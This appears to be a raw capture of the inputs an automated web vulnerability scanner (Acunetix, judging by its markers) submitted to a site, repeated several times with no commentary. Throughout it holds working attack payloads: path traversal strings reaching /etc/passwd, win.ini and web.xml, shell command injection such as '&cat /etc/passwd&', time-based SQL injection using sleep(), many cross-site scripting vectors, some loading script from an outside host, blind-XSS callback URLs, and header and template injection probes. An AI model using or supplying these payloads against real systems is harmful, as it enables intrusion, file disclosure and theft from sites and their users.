WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(934615))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1

1

1

-1

1<iframe src='data:text/html

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

-1)

1<body onload=prompt(960284)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${99183+99381}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952427)>

|cat /etc/passwd#

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n907681=v954761

)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

j0apDBi0'

'|'ld

1

1<img src=xyz OnErRor=prompt(978473)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

wjDLc8Xg')

1<img/src=">" onerror=alert(959250)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

9Ipb9LPI'))

/etc/passwd

^(#$!@#$)(()))******

1

1

'

'"()

1<ScRiPt%20>prompt(996250)</sCripT>

testasp.vulnweb.com

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1&lt

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1)

1

\xf6<img acu onmouseover=prompt(905729) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(922020)>

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://hit1Fd41z48TU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

blUxvLx2'

1

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

file:///etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

&dir

1

GQUPRfws')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1_gVMnN <ScRiPt >prompt(914883)</ScRiPt>

Nz3sc9ld'))

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

comments

1

|dir

1

1'"()&%<ScRiPt >prompt(903223)</ScRiPt>

'"

1

1

1

comments/.

WEB-INF\web.xml

'|dir

1

'"()&%<ScRiPt >prompt(998641)</ScRiPt>

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_952561

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu6154\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6154

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux1484\xc0\xbez1\xc0\xbcz2a\x90bcxuca1484

................windowswin.ini

1

1

1

1<ScRiPt >prompt(910772)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(980010)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(915079)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979346></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(958386)</ScRiPt>

WEB-INF/web.xml

1

response.write(9245682*9860030)

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(924405)">

1

1

'+response.write(9245682*9860030)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994242)"></g></svg>

1

&cat /etc/passwd&

1

1

"+response.write(9245682*9860030)+"

1

1

1<div style=width:expression(prompt(921449))>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1<body onload=prompt(961373)>

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

${99986+100061}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(924003)>

1

`cat /etc/passwd`

1&n981550=v990012

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(919806)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(981948)>

1

)

1

testasp.vulnweb.com

3KAErJz4'

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(954949)</sCripT>

Ap1NAw4s')

/etc/passwd

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

bTZz3WL2'))

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(945416) //\xf6>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1

1

1

1

1<input autofocus onfocus=prompt(996219)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitkWOJte6y7G.bxss.me/

1

-1)

"

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

file:///etc/passwd

1

comments

1

&dir

1_R9FGa <ScRiPt >prompt(954086)</ScRiPt>

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

2jIfg92Y'

'"

http://www.acunetix.tst

1

1

'&dir&'

1

1

A68sQEt0')

<!--

1

WEB-INF/web.xml

1

1

"&dir&"

1

1

1

l0Y6DGAK'))

|dir

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(906399)</ScRiPt>

1

1

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(968587)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1_983435

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4544\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4544

1

1

1

................windowswin.ini

acux8349\xc0\xbez1\xc0\xbcz2a\x90bcxuca8349

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(903278)</ScRiPt>

1

1

1

1<script>prompt(905681)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965269)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950606></ScRiPt>

1

1

1<ScRiPt >prompt(918349)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(982061)">

&cat /etc/passwd&

1

response.write(9342377*9602493)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906095)"></g></svg>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9342377*9602493)+'

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(956983))>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

"+response.write(9342377*9602493)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(963637)>

1

${99507+99626}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952523)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n989109=v994201

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(925197)>

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

)

1

1<img/src=">" onerror=alert(931035)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

399rGhCS'

1

!(()&&!|*|*|

'"()

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

/etc/passwd

4977rinG')

1

1<ScRiPt%20>prompt(913230)</sCripT>

1

^(#$!@#$)(()))******

testasp.vulnweb.com

"

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

iiXT4sFr'))

1

1

1&lt

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

\xf6<img acu onmouseover=prompt(930487) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1<input autofocus onfocus=prompt(945269)>

1

1

'&dir&'

4hdDJQIu'

1

acunetix_wvs_invalid_filename

http://hitJ5f0x9CkhM.bxss.me/

1

"&dir&"

1

<a href='http://www.acunetix.com'>website security</a>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Jl51NTTs')

1

file:///etc/passwd

1

comments

|dir

WHHEFXDd'))

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

1

'|dir

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1_bb4wQ <ScRiPt >prompt(938318)</ScRiPt>

1'"()&%<ScRiPt >prompt(977186)</ScRiPt>

'"

comments/.

1

1

1

WEB-INF/web.xml

"|dir

1

1

<!--

1

'"()&%<ScRiPt >prompt(975807)</ScRiPt>

1

1

WEB-INF\web.xml

1

1_923772

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu4433\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4433

1

../../../../../../../../../../boot.ini

1

1

acux1083\xc0\xbez1\xc0\xbcz2a\x90bcxuca1083

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(996302)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(992536)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(917480)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976223></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(951206)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(968919)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964021)"></g></svg>

response.write(9001720*9656800)

1

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(967564))>

'+response.write(9001720*9656800)+'

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"+response.write(9001720*9656800)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(994869)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938612)>

"&cat /etc/passwd&"

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(975207)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1))

${99448+99824}

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(950864)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

hTMacJ8n'

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

)

1&n994300=v964514

1<ScRiPt%20>prompt(956415)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

m53k9WqU')

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

8CfCouQ2'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(986335) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

/etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(971698)>

-1)

"

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitLUvADkwz2I.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

pDthzgS2'

1

[url=http://www.acunetix.com]website security[/url]

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

http://www.acunetix.tst

MZGvm73C')

1

1

1_H5RiM <ScRiPt >prompt(945686)</ScRiPt>

comments

1

1

&dir

1

1

LE9jRWb8'))

1

'"

comments/.

1'"()&%<ScRiPt >prompt(922158)</ScRiPt>

1

'&dir&'

file:///etc/passwd

1

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(981161)</ScRiPt>

"&dir&"

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_957629

|dir

1

1

1

1

1

acu6037\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6037

'|dir

WEB-INF/web.xml

1

1

1

"|dir

acux7784\xc0\xbez1\xc0\xbcz2a\x90bcxuca7784

1

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(978686)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1<script>prompt(955054)</script>

1

1

1

1

1<ScRiPt >prompt(922846)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936730></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974004)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(922793)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993807)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9056005*9790362)

1

1

1<div style=width:expression(prompt(999428))>

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9056005*9790362)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

"+response.write(9056005*9790362)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(996094)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

cat /etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911230)>

1

1

1

../../../../../../../../../../etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(979611)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100191+99708}

1

-1))

1

1

1<img/src=">" onerror=alert(978261)>

|cat /etc/passwd#

A4wIpeas'

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n915704=v960479

'|'ld

1

1

1<ScRiPt%20>prompt(939917)</sCripT>

YBCgfmjv')

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

szH5zBpC'))

1

1&lt

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(989642) //\xf6>

1

^(#$!@#$)(()))******

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

'

1<input autofocus onfocus=prompt(999809)>

1

1

-1))

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

Z1hWLhxp'

1

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

http://hitWczTCKmh2W.bxss.me/

VSj5tQZs')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_b94Gy <ScRiPt >prompt(908476)</ScRiPt>

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

6VN0wCyq'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'&dir&'

1

comments

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

1

1

1

comments/.

1

|dir

<!--

1

1

1'"()&%<ScRiPt >prompt(989116)</ScRiPt>

1

1

1

'|dir

'"()&%<ScRiPt >prompt(981637)</ScRiPt>

file:///etc/passwd

1

1

"|dir

1

1

1

1

1

1_996557

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

acu5527\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5527

1

1

WEB-INF\web.xml

1

1

1

1

acux5950\xc0\xbez1\xc0\xbcz2a\x90bcxuca5950

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(946177)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(930730)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(905747)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957568></ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(928907)</ScRiPt>

1

response.write(9839515*9912905)

1

1

1<video><source onerror="javascript:prompt(973806)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9839515*9912905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973798)"></g></svg>

1

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(937101))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9839515*9912905)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1<body onload=prompt(927050)>

1

1

1

WEB-INF/web.xml

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900775)>

1

-1)

1

WEB-INF\web.xml

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(973096)>

${99673+99860}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(956461)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

0oDooSxp'

)

1&n988834=v920437

'|'ld

1

1<ScRiPt%20>prompt(951263)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ARIVK6hK')

"|"ld

1

1

!(()&&!|*|*|

'

1&lt

eQvVUhU7'))

testasp.vulnweb.com

'"()

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(929413) //\xf6>

"

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(926175)>

1

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hitCyaEFoctjz.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

JDll39A1'

1

||cat /etc/passwd

1

comments

vxVg73D1')

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

89KNPsm3'))

comments/.

1_l8i9L <ScRiPt >prompt(968211)</ScRiPt>

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"

1

"&dir&"

1'"()&%<ScRiPt >prompt(917971)</ScRiPt>

1

1

<!--

1

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(921560)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

1_936883

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2390

../../../../../../../../../../boot.ini

1

1

1

acux6757\xc0\xbez1\xc0\xbcz2a\x90bcxuca6757

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(920786)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(933426)</script>

1

1

1<ScRiPt >prompt(985230)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997242></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948492)</ScRiPt>

1

1

response.write(9720025*9664803)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989653)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9720025*9664803)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901432)"></g></svg>

1

"+response.write(9720025*9664803)+"

&cat /etc/passwd&

1

WEB-INF/web.xml

